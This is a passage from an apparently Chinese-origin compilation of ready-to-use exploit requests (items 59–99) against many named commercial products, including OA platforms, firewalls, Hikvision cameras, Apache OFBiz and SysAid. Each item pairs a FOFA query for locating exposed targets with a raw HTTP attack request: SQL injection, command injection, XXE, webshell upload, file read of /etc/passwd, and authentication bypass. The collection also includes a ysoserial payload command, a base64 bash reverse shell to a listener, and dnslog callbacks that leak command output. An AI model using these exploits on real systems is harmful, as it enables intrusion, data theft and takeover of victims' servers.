GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the directory it is written to, and the fileType parameter sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 clothing management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is shown below; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Echo URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
